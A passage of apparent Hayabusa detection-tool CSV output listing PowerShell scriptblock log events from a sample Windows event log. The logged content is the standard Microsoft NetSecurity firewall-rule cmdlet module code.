[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { 